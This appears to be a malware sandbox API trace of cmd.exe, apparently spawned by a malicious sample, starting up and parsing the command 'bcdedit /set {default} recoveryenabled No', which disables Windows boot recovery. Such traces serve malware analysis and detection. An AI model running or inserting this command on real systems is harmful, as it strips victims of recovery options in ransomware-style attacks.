[0076.893] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.893] __set_app_type (_Type=0x1) [0076.894] __p__fmode () returned 0x770331f4 [0076.894] __p__commode () returned 0x770331fc [0076.894] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.894] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.894] GetCurrentThreadId () returned 0xba4 [0076.894] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xba4) returned 0x60 [0076.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.894] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.894] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.895] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.895] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fafc | out: phkResult=0x14fafc*=0x0) returned 0x2 [0076.895] VirtualQuery (in: lpAddress=0x14fb33, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.895] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.895] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.895] VirtualQuery (in: 
lpAddress=0x53000, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.895] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14facc, dwLength=0x1c | out: lpBuffer=0x14facc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0076.895] GetConsoleOutputCP () returned 0x1b5 [0076.895] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.895] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0076.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.896] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.896] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0076.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.896] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.896] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.896] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0076.897] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.897] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.897] GetEnvironmentStringsW () returned 0x382070* [0076.897] GetProcessHeap () returned 0x370000 [0076.897] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xaca) returned 0x382b48 [0076.897] FreeEnvironmentStringsW (penv=0x382070) returned 1 [0076.897] GetProcessHeap () returned 0x370000 [0076.897] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4) returned 0x380ca8 [0076.897] GetEnvironmentStringsW () returned 0x382070* [0076.897] GetProcessHeap () returned 0x370000 [0076.897] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xaca) returned 0x383620 [0076.898] 
FreeEnvironmentStringsW (penv=0x382070) returned 1 [0076.898] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea6c | out: phkResult=0x14ea6c*=0x68) returned 0x0 [0076.898] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x0, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.898] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x1, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.898] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x1, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.898] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x0, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x40, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x40, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x40, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.899] RegCloseKey (hKey=0x68) returned 0x0 [0076.899] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea6c | out: phkResult=0x14ea6c*=0x68) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x40, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x1, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x1, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x0, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x9, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x4, lpData=0x14ea78*=0x9, lpcbData=0x14ea70*=0x4) returned 0x0 [0076.899] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea74, lpData=0x14ea78, lpcbData=0x14ea70*=0x1000 | out: lpType=0x14ea74*=0x0, lpData=0x14ea78*=0x9, lpcbData=0x14ea70*=0x1000) returned 0x2 [0076.899] RegCloseKey (hKey=0x68) returned 0x0 [0076.899] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0076.899] srand 
(_Seed=0x5e9c43c9) [0076.899] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} recoveryenabled No" [0076.899] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} recoveryenabled No" [0076.900] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.900] GetProcessHeap () returned 0x370000 [0076.900] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x210) returned 0x382070 [0076.900] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x382078, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.900] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.900] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.900] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.900] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.900] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.900] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.900] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.900] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.900] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.900] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.900] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.900] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.900] GetProcessHeap () returned 0x370000 
[0076.900] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x382b48 | out: hHeap=0x370000) returned 1 [0076.900] GetEnvironmentStringsW () returned 0x382288* [0076.900] GetProcessHeap () returned 0x370000 [0076.900] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xae2) returned 0x384be8 [0076.901] FreeEnvironmentStringsW (penv=0x382288) returned 1 [0076.901] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.901] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.901] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.901] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.901] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.901] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.901] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.901] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.901] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.901] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.901] GetProcessHeap () returned 0x370000 [0076.901] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x54) returned 0x3856d8 [0076.901] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f838 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f838, lpFilePart=0x14f834 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f834*="Desktop") returned 0x25 [0076.901] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.901] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f5b4 | out: 
lpFindFileData=0x14f5b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x381ef0 [0076.901] FindClose (in: hFindFile=0x381ef0 | out: hFindFile=0x381ef0) returned 1 [0076.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f5b4 | out: lpFindFileData=0x14f5b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x381ef0 [0076.902] FindClose (in: hFindFile=0x381ef0 | out: hFindFile=0x381ef0) returned 1 [0076.902] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f5b4 | out: lpFindFileData=0x14f5b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x381ef0 [0076.902] FindClose (in: hFindFile=0x381ef0 | out: hFindFile=0x381ef0) returned 1 [0076.902] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.902] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0076.902] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.902] GetProcessHeap () returned 0x370000 [0076.902] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384be8 | out: hHeap=0x370000) returned 1 [0076.902] GetEnvironmentStringsW () returned 0x3840f8* [0076.902] GetProcessHeap () returned 0x370000 [0076.902] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb36) returned 0x385f38 [0076.902] FreeEnvironmentStringsW (penv=0x3840f8) returned 1 [0076.902] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.902] GetProcessHeap () returned 0x370000 [0076.902] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3856d8 | out: hHeap=0x370000) returned 1 [0076.903] GetProcessHeap () returned 0x370000 [0076.903] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x400e) returned 0x386a78 [0076.903] GetProcessHeap () returned 0x370000 [0076.903] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x60) returned 0x382dc8 [0076.903] GetProcessHeap () returned 0x370000 [0076.903] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386a78 | out: hHeap=0x370000) returned 1 [0076.903] GetConsoleOutputCP () returned 0x1b5 [0076.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.903] GetUserDefaultLCID () returned 0x409 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f978, cchData=128 | out: lpLCData="0") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f978, cchData=128 | out: 
lpLCData="0") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f978, cchData=128 | out: lpLCData="1") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0076.904] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0076.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0076.905] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0076.905] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0076.905] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.906] GetProcessHeap () returned 0x370000 [0076.906] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20c) returned 0x382e30 [0076.906] GetConsoleTitleW (in: lpConsoleTitle=0x382e30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.906] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.906] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0076.906] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 
0x76d44a5d [0076.906] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0076.907] GetProcessHeap () returned 0x370000 [0076.907] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x400a) returned 0x386a78 [0076.907] GetProcessHeap () returned 0x370000 [0076.907] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386a78 | out: hHeap=0x370000) returned 1 [0076.907] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0076.907] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0076.907] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0076.907] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0076.907] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0076.907] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0076.907] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0076.907] GetProcessHeap () returned 0x370000 [0076.907] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x58) returned 0x383048 [0076.907] GetProcessHeap () returned 0x370000 [0076.907] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x18) returned 0x3830a8 [0076.908] GetProcessHeap () returned 0x370000 [0076.908] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4e) returned 0x3830c8 [0076.909] GetConsoleTitleW (in: lpConsoleTitle=0x14f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.107] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0077.107] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0077.108] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0077.108] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0077.108] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 
[0077.108] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0077.108] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0077.108] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0077.108] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0077.108] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0077.108] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0077.108] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0077.108] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0077.108] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0077.108] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0077.108] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0077.108] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0077.108] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0077.108] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0077.108] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0077.108] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0077.108] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0077.108] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0077.108] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0077.108] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0077.108] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0077.108] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0077.108] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0077.108] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 
[0077.108] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0077.108] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0077.109] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0077.109] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0077.109] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0077.109] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0077.109] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0077.109] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0077.109] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0077.109] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0077.109] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0077.109] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0077.109] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0077.109] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0077.109] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0077.109] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0077.109] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0077.109] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0077.109] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0077.109] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0077.109] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0077.109] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0077.109] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0077.109] 
_wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0077.109] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0077.109] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0077.109] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0077.109] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0077.109] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0077.109] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0077.110] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0077.110] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0077.110] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0077.110] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0077.110] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0077.110] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0077.110] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0077.110] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0077.110] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0077.110] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0077.110] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0077.110] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0077.110] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0077.110] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0077.110] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0077.110] GetProcessHeap () returned 0x370000 [0077.110] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x210) returned 0x383120 [0077.110] GetProcessHeap () returned 0x370000 [0077.110] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x5e) returned 0x383338 [0077.110] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0077.111] 
